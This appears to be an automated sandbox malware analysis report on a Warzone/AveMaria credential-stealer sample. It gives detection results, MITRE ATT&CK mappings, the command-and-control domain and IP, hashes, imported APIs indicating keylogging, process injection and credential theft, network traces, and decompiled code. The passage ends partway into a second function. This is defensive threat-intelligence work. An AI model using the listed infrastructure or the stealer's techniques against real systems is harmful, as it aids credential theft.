Source: Yara match	File source: 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	11 Create Account	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	21 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Endpoint Denial of Service
Default Accounts	2 Service Execution	1 Windows Service	1 Windows Service	2 Obfuscated Files or Information	31 Input Capture	1 System Service Discovery	Remote Desktop Protocol	31 Input Capture	Exfiltration Over Bluetooth	22 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	11 Process Injection	3 Masquerading	1 Credentials In Files	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Virtualization/Sandbox Evasion	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Access Token Manipulation	LSA Secrets	11 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Process Injection	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Hidden Files and Directories	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Users	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
ax4BSyUKd4.exe	97%	ReversingLabs	Win32.Backdoor.Warzone
ax4BSyUKd4.exe	100%	Avira	TR/Crypt.XPACK.Gen2
ax4BSyUKd4.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
feeders.ninqshing.net	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
feeders.ninqshing.net	45.41.205.55	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
feeders.ninqshing.net	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/syohex/java-simple-mine-sweeperC:	ax4BSyUKd4.exe	false		high
https://github.com/syohex/java-simple-mine-sweeper	ax4BSyUKd4.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.41.205.55	feeders.ninqshing.net	Reserved		22400	WEB2OBJECTSUS	true

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	898714
Start date and time:	2023-07-03 11:17:43 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	3
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	ax4BSyUKd4.exe
Original Sample Name:	66552aa98285ba1c58a90ae8eee06c7a.exe
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@1/0@2/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.6% (good quality ratio 97.7%) Quality average: 88.3% Quality standard deviation: 20.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 36 Number of non-executed functions: 100
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): audiodg.exe, WMIADAP.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
VT rate limit hit for: ax4BSyUKd4.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WEB2OBJECTSUS	YPvUj6ZtWG.elf	Get hash	malicious	Mirai	Browse	142.147.201.173
	kzDFNFn9W1.elf	Get hash	malicious	Mirai	Browse	142.147.192.145
	skid.x86.elf	Get hash	malicious	Moobot	Browse	142.147.232.239
	3NMmsuOdSf.elf	Get hash	malicious	Unknown	Browse	104.194.192.100
	networkrip.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	45.41.240.4
	SMofOcO9le.elf	Get hash	malicious	Unknown	Browse	45.61.104.74
	5QmKBRYuSS	Get hash	malicious	Mirai	Browse	167.160.52.128
	irc.spc.vir	Get hash	malicious	Unknown	Browse	142.147.248.192
	vailon.arm-20220608-2250	Get hash	malicious	Mirai	Browse	45.56.185.142
	5Koo5tqsjq	Get hash	malicious	Unknown	Browse	45.41.237.117
	louCCFrO4t.exe	Get hash	malicious	FormBook, GuLoader	Browse	45.41.235.225
	Discord Accout Nuke.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	45.41.240.44
	8cAZneRN6B.exe	Get hash	malicious	FormBook, GuLoader	Browse	45.41.235.225
	njUIPPVrud.exe	Get hash	malicious	FormBook, GuLoader	Browse	45.41.235.225
	phantom.arm	Get hash	malicious	Mirai	Browse	142.147.232.245
	bF4rLSD6Qd.hta	Get hash	malicious	BazaLoader	Browse	45.41.204.158
	EXTRACTED_bF4rLSD6Qd.vbs	Get hash	malicious	BazaLoader	Browse	45.41.204.158
	RXJPatkj9M.dll	Get hash	malicious	Unknown	Browse	45.41.204.147
	document.xlsm	Get hash	malicious	Hidden Macro 4.0 BazaLoader	Browse	45.41.204.158
	macosx.dll	Get hash	malicious	BazaLoader	Browse	45.41.204.150

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.372298027991403
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	ax4BSyUKd4.exe
File size:	156'160 bytes
MD5:	66552aa98285ba1c58a90ae8eee06c7a
SHA1:	54b991528dff963d67707f69ff6f1c30ba04de8a
SHA256:	8880dce3daf97e67a978a171305d7fd8f487fc74793ec760580bdd19197d77fd
SHA512:	e753ba4c539657e4869000e2a34b6fc8086c71a9e7bf6db6d374e013e07cfd5b3ce0f65f82afaec6bdee773f691649f48bc70ec277c6d632aaeb8ba5ce792781
SSDEEP:	3072:4NLOpnhTdOw9YAJOzIY9gVl01T2ENipdDg0z5:4NLYdT97JSIFl0QENqF
TLSH:	16E37C327BE188B9E6F6013109F53F398B7DF93111208AAB63905A468D37BCDE955783
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n..............._...............]......m......n.................................5...T.......T.......Rich...................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x405e28
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5F45EC72 [Wed Aug 26 05:00:34 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	b9494f92817e4dfbe294ad842e8f1988

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 44h
push esi
call dword ptr [00417094h]
mov ecx, eax
mov al, byte ptr [ecx]
cmp al, 22h
jne 00007F7304CA192Ah
inc ecx
mov dl, byte ptr [ecx]
test dl, dl
je 00007F7304CA1913h
mov al, dl
mov dl, al
cmp al, 22h
je 00007F7304CA190Bh
inc ecx
mov dl, byte ptr [ecx]
mov al, dl
test dl, dl
jne 00007F7304CA18F3h
lea eax, dword ptr [ecx+01h]
cmp dl, 00000022h
cmovne eax, ecx
mov ecx, eax
jmp 00007F7304CA1910h
inc ecx
mov al, byte ptr [ecx]
cmp al, 20h
jnle 00007F7304CA18FBh
jmp 00007F7304CA1909h
cmp al, 20h
jnle 00007F7304CA1909h
inc ecx
mov al, byte ptr [ecx]
test al, al
jne 00007F7304CA18F7h
and dword ptr [ebp-18h], 00000000h
lea eax, dword ptr [ebp-44h]
push eax
call dword ptr [00417098h]
call 00007F7304CA1932h
mov edx, 0041C030h
mov ecx, 0041C000h
call 00007F7304CA1950h
push 00000000h
call dword ptr [00417090h]
push ecx
push ecx
call 00007F7304CB0F49h
mov esi, eax
call 00007F7304CA1922h
push esi
call dword ptr [00417164h]
int3
mov dword ptr [0055AD14h], 00000020h
call 00007F7304CA1814h
mov dword ptr [0055A85Ch], eax
ret
mov eax, dword ptr [0055AD90h]
test eax, eax
je 00007F7304CA1910h
mov ecx, dword ptr [0055A85Ch]
lea edx, dword ptr [ecx+eax*4]
jmp 00007F7304CA1906h
ret
push ebx
push esi
push edi
mov edi, ecx
mov esi, edx
sub esi, edi
xor eax, eax
add esi, 00000000h

Rich Headers

Programming Language:

[C++] VS2008 SP1 build 30729
[ C ] VS2005 build 50727
[C++] VS2005 build 50727
[ASM] VS2003 (.NET) build 3077
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1aa84	0x12c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15b000	0x11e0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1a930	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x17000	0x390	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x15077	0x15200	False	0.5715953217455622	data	6.511896612842568	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x17000	0x4e7c	0x5000	False	0.3580078125	data	4.880038818289345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1c000	0x13edd0	0xa800	False	0.31582496279761907	data	5.39582339439234	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x15b000	0x11e0	0x1200	False	0.8441840277777778	data	6.740845786119252	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.bss	0x15d000	0x1000	0x200	False	0.365234375	data	3.0329998694491307	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Imports

DLL	Import
bcrypt.dll	BCryptGenerateSymmetricKey, BCryptDecrypt, BCryptSetProperty, BCryptOpenAlgorithmProvider
ntdll.dll	NtQueryInformationProcess, RtlInitUnicodeString, RtlEqualUnicodeString
KERNEL32.dll	GetModuleHandleA, GetCommandLineA, GetStartupInfoA, HeapFree, VirtualAlloc, HeapReAlloc, VirtualQuery, TerminateThread, CreateThread, WriteProcessMemory, GetCurrentProcess, OpenProcess, GetWindowsDirectoryA, VirtualProtectEx, VirtualAllocEx, CreateRemoteThread, CreateProcessA, WriteFile, CreateFileW, LoadLibraryW, GetLocalTime, GetCurrentThreadId, GetCurrentProcessId, ReadFile, FindFirstFileA, GetBinaryTypeW, FindNextFileA, GetFullPathNameA, GetTempPathW, GetPrivateProfileStringW, CreateFileA, GlobalAlloc, GetCurrentDirectoryW, SetCurrentDirectoryW, GetFileSize, FreeLibrary, SetDllDirectoryW, GetFileSizeEx, LocalAlloc, lstrcmpW, WaitForSingleObject, CreateProcessW, VirtualProtect, SetFilePointer, ReadProcessMemory, VirtualQueryEx, GetModuleHandleW, IsWow64Process, WaitForMultipleObjects, CreatePipe, PeekNamedPipe, DuplicateHandle, SetEvent, ExitProcess, GetModuleFileNameW, LoadResource, FindResourceW, GetComputerNameW, GlobalMemoryStatusEx, LoadLibraryExW, FindFirstFileW, FindNextFileW, GetLogicalDriveStringsW, DeleteFileW, CopyFileW, GetDriveTypeW, EnterCriticalSection, GetTickCount, InitializeCriticalSection, DeleteCriticalSection, CreateMutexA, ReleaseMutex, TerminateProcess, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, WinExec, Wow64DisableWow64FsRedirection, GetSystemDirectoryW, Wow64RevertWow64FsRedirection, Process32First, Process32Next, SizeofResource, GetTempPathA, LockResource, lstrcpyW, WideCharToMultiByte, lstrcpyA, Sleep, MultiByteToWideChar, lstrcatA, lstrcmpA, lstrlenA, ExpandEnvironmentStringsW, lstrlenW, CloseHandle, lstrcatW, GetLastError, VirtualFree, SetLastError, GetModuleFileNameA, CreateDirectoryW, GetProcAddress, LoadLibraryA, GetProcessHeap, CreateEventA, HeapAlloc, LocalFree, LeaveCriticalSection
USER32.dll	CreateDesktopW, CharLowerW, GetKeyState, GetMessageA, DispatchMessageA, CreateWindowExW, CallNextHookEx, GetAsyncKeyState, RegisterClassW, GetRawInputData, MapVirtualKeyA, DefWindowProcA, RegisterRawInputDevices, TranslateMessage, wsprintfA, GetKeyNameTextW, PostQuitMessage, MessageBoxA, GetLastInputInfo, GetForegroundWindow, GetWindowTextW, ToUnicode, wsprintfW
ADVAPI32.dll	LookupPrivilegeValueW, AdjustTokenPrivileges, AllocateAndInitializeSid, OpenProcessToken, FreeSid, LookupAccountSidW, GetTokenInformation, QueryServiceStatusEx, InitializeSecurityDescriptor, RegDeleteKeyA, SetSecurityDescriptorDacl, RegCreateKeyExW, RegSetValueExA, RegDeleteValueW, RegQueryValueExW, RegOpenKeyExW, RegOpenKeyExA, RegEnumKeyExW, RegQueryValueExA, RegQueryInfoKeyW, RegCloseKey, OpenServiceW, ChangeServiceConfigW, QueryServiceConfigW, EnumServicesStatusExW, StartServiceW, RegSetValueExW, RegCreateKeyExA, OpenSCManagerW, CloseServiceHandle, RegDeleteKeyW
SHELL32.dll	SHFileOperationW, ShellExecuteExW, SHGetSpecialFolderPathW, SHCreateDirectoryExW, ShellExecuteW, SHGetKnownFolderPath, ShellExecuteExA, SHGetFolderPathW
urlmon.dll	URLDownloadToFileW
WS2_32.dll	getaddrinfo, setsockopt, freeaddrinfo, htons, recv, connect, socket, send, WSAStartup, shutdown, closesocket, WSACleanup, InetNtopW, gethostbyname, inet_addr
ole32.dll	CoInitialize, CoUninitialize, CoCreateInstance, CoInitializeSecurity, CoTaskMemFree
SHLWAPI.dll	PathFileExistsW, PathFindExtensionW, StrStrW, PathRemoveFileSpecA, StrStrA, PathCombineA, PathFindFileNameW, AssocQueryStringW
NETAPI32.dll	NetLocalGroupAddMembers, NetUserAdd
OLEAUT32.dll	VariantInit
CRYPT32.dll	CryptUnprotectData, CryptStringToBinaryA, CryptStringToBinaryW
PSAPI.DLL	GetModuleFileNameExW

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2023 11:18:41.980226040 CEST	49690	443	192.168.2.4	45.41.205.55
Jul 3, 2023 11:18:41.980300903 CEST	443	49690	45.41.205.55	192.168.2.4
Jul 3, 2023 11:18:41.980467081 CEST	49690	443	192.168.2.4	45.41.205.55
Jul 3, 2023 11:19:47.201255083 CEST	49694	443	192.168.2.4	45.41.205.55
Jul 3, 2023 11:19:47.201324940 CEST	443	49694	45.41.205.55	192.168.2.4
Jul 3, 2023 11:19:47.201430082 CEST	49694	443	192.168.2.4	45.41.205.55

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 3, 2023 11:18:41.863348007 CEST	50911	53	192.168.2.4	8.8.8.8
Jul 3, 2023 11:18:41.976537943 CEST	53	50911	8.8.8.8	192.168.2.4
Jul 3, 2023 11:19:47.034995079 CEST	52239	53	192.168.2.4	8.8.8.8
Jul 3, 2023 11:19:47.198993921 CEST	53	52239	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 3, 2023 11:18:41.863348007 CEST	192.168.2.4	8.8.8.8	0xa012	Standard query (0)	feeders.ninqshing.net	A (IP address)	IN (0x0001)	false
Jul 3, 2023 11:19:47.034995079 CEST	192.168.2.4	8.8.8.8	0xdac0	Standard query (0)	feeders.ninqshing.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 3, 2023 11:18:41.976537943 CEST	8.8.8.8	192.168.2.4	0xa012	No error (0)	feeders.ninqshing.net		45.41.205.55	A (IP address)	IN (0x0001)	false
Jul 3, 2023 11:19:47.198993921 CEST	8.8.8.8	192.168.2.4	0xdac0	No error (0)	feeders.ninqshing.net		45.41.205.55	A (IP address)	IN (0x0001)	false

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: ax4BSyUKd4.exePID: 6504, Parent PID: 3528

General

Target ID:	1
Start time:	11:18:39
Start date:	03/07/2023
Path:	C:\Users\user\Desktop\ax4BSyUKd4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ax4BSyUKd4.exe
Imagebase:	0x1030000
File size:	156'160 bytes
MD5 hash:	66552AA98285BA1C58A90AE8EEE06C7A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000001.00000003.544704183.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000001.00000003.544839095.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000001.00000000.540303660.0000000001047000.00000002.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000001.00000002.808730735.0000000003325000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: ax4BSyUKd4.exePID: 6504, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	50

Executed Functions

Function 010448B6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 138
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E010448B6(intOrPtr __ecx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed short* _v36;
				char _v44;
				signed int* _t43;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t54;
				signed int _t57;
				char _t60;
				signed int _t61;
				intOrPtr* _t63;
				signed int _t64;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				signed int _t76;
				signed int _t85;
				signed int _t87;
				signed short* _t88;

				_t87 = 0;
				_v28 = __ecx;
				__imp__CoInitialize(0); // executed
				_t43 =  &_v12;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				__imp__CoCreateInstance(0x1047600, 0, 1, 0x104a77c, _t43); // executed
				_t66 = _v12;
				if(_t66 != 0) {
					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x10475f0,  &_v8, 0);
					_t67 = _v8;
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
						_t64 = 0;
						while(1) {
							_t47 = _v8;
							_v20 = _t87;
							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1,  &_v24,  &_v20);
							if(_t48 != 0) {
								break;
							}
							_t50 = _v24 + _t64 * 4;
							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x1047580,  &_v16);
							if(_t48 != 0) {
								break;
							}
							__imp__#8( &_v44);
							_t54 = _v16;
							_push(_t87);
							_push( &_v44);
							_push(L"Description");
							_push(_t54);
							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
								L6:
								_t73 = 0x1c;
								if(E01036099(_t73) == 0) {
									_t85 = _t87;
								} else {
									_t85 = E01044B6E(_t56);
								}
								_t88 = _v36;
								_t57 =  *_t88 & 0x0000ffff;
								if(_t57 == 0) {
									L12:
									 *(_t85 + 8) = _t64;
									E01032503(_v28 + 4, _t85);
									_t64 = _t64 + 1;
									_t87 = 0;
									continue;
								} else {
									_t76 = _t57;
									do {
										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
										_t60 =  *_t88;
										_t88 =  &(_t88[1]);
										 *((char*)(_t87 +  *_t85)) = _t60;
										_t87 = _t87 + 1;
										_t61 =  *_t88 & 0x0000ffff;
										_t76 = _t61;
									} while (_t61 != 0);
									goto L12;
								}
							}
							_t63 = _v16;
							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
							if(_t48 != 0) {
								break;
							}
							goto L6;
						}
						_t70 = _v8;
						if(_t70 != 0) {
							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
							_v8 = _t87;
						}
						_t71 = _v12;
						if(_t71 != 0) {
							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
							_v12 = _t87;
						}
						__imp__CoUninitialize();
						return _t48;
					}
				}
				return _t43;
			}

0x010448bf
0x010448c1
0x010448c5
0x010448cb
0x010448ce
0x010448df
0x010448e2
0x010448e5
0x010448eb
0x010448f0
0x01044903
0x01044906
0x0104490b
0x01044914
0x01044917
0x010449c9
0x010449c9
0x010449d3
0x010449dc
0x010449e1
0x00000000
0x00000000
0x0104492b
0x01044932
0x01044937
0x00000000
0x00000000
0x01044941
0x01044947
0x0104494d
0x0104494e
0x0104494f
0x01044956
0x0104495c
0x01044975
0x01044977
0x0104497f
0x0104498c
0x01044981
0x01044988
0x01044988
0x0104498e
0x01044991
0x01044997
0x010449b7
0x010449bb
0x010449c1
0x010449c6
0x010449c7
0x00000000
0x01044999
0x01044999
0x0104499b
0x0104499e
0x010449a4
0x010449a6
0x010449a9
0x010449ac
0x010449ad
0x010449b0
0x010449b2
0x00000000
0x0104499b
0x01044997
0x0104495e
0x0104496e
0x01044973
0x00000000
0x00000000
0x00000000
0x01044973
0x010449e7
0x010449ec
0x010449f1
0x010449f4
0x010449f4
0x010449f7
0x010449fc
0x01044a01
0x01044a04
0x01044a04
0x01044a07
0x00000000
0x01044a07
0x0104490b
0x01044a11

APIs

CoInitialize.OLE32(00000000), ref: 010448C5
CoCreateInstance.OLE32(01047600,00000000,00000001,0104A77C,?,?,?,?,01044EDE,?,?,?,01044222), ref: 010448E5
VariantInit.OLEAUT32(?), ref: 01044941
CoUninitialize.OLE32(?,?,?,01044EDE,?,?,?,01044222), ref: 01044A07

Strings

FriendlyName, xrefs: 01044966
Description, xrefs: 0104494F

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CreateInitInitializeInstanceUninitializeVariant
String ID: Description$FriendlyName
API String ID: 4142528535-3192352273
Opcode ID: 072f6c4cc6da585f810418d905cd2d2f9e2080f5d09335d3c60107f0fa51fc72
Instruction ID: 0d348c620b88126bbef456bfcf97d909726285a41e42a0f773a47c7e34d8fc1a
Opcode Fuzzy Hash: 072f6c4cc6da585f810418d905cd2d2f9e2080f5d09335d3c60107f0fa51fc72
Instruction Fuzzy Hash: BE4154B8A00245AFDF24DFA5C8C4EAEBBB9FF84704B1444ADE581DB250D775D901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0103577F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E0103577F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v12;
